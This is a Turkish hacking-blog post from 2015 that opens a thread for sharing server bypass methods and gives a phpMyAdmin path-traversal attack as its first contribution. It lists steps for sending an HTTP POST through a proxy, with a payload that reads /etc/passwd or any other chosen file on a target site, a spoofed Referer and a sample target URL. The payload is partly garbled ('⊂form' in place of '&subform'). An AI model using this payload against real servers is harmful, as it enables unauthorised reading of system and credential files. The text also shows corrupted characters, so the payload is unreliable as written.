-
30 Mart 2015 Pazartesi

SA.

Bölüme adaylığımı koydum bundan dolayı çalışmalara başladım.:)Bu Konu altından bypass yöntemleri verelim . Her sunucunun kendine özel konfigürasyonu vardır,bu yüzdende her exploit her sunucuda çalışmayabilir. Buradada devreye Cyber-Warrior girecek ve bu konudan istediğiniz sunucnun geçiş yöntemini paylaşabilecek/alabileceksiniz.

Lütfen konuyu dağıtacak postlar atılmasın,herkes bildiğini eklesinki faydalı bir paylaşım olsun.İlk paylaşımıda ben yapayım.Genellikle bütün sunucularda phpmyadmin kurulu olur,bende bir exploit vereceğim ve konuyu güncel tutacagım , fırsat buldukça eklemeler yapacağım..


Quote: Popüler Mysql Yönetim yazılımı olan PhpMyAdmin’deki bir açıkla sunucudaki dosyaları görüntüleyebilirsiniz. Açık için bir exploit bulunsa da bunu kolaylıkla Clicker gibi HTTP Post yapan yazılımlarla gerçekleştirebilirsiniz.

HTTP emulatoru kullanarak saldırı yapmak için:

1- Çalışan bir proxy yükleyin.
2- Post seçeneğini kullanın.
3- Data kısmına aşağıdakileri girin:

usesubform[1]=1&usesubform[2]=1⊂form[1][redirect]=../../../../../etc/pas
swd⊂form[1][cXIb8O3]=1

(../…./etc/passwd dosyasını okunmasını istediğiniz dosya ile değiştirebilirsiniz)

4- Referer kısmını site ile aynı yapın.
5- Url kısmına

http://www.siteadresi.com/phpmyadmin

gibi bir adres girin.

Post işlemini gerçekleştirdikten sonra açılan sayfada Unable to Access yazarsa dosyanın sunucuda bulunmadığı anlamına gelir, farklı dosya adları deneyebilirsiniz…
ETİKETLER :
Different Themes
REKLAM ALANI !
SİTEMİZE REKLAM VERMEK İSTİYORSANIZ YÖNETİCİ İLETİŞİM FORUMUNU KULLANABİLİRSİNİZ

0 yorum

Yorum Kuralları:
1) Küfür Yasaktır
2) Teklif Hakları Kullanıcıya Aittir

Kaydol: Kayıt Yorumları ( Atom )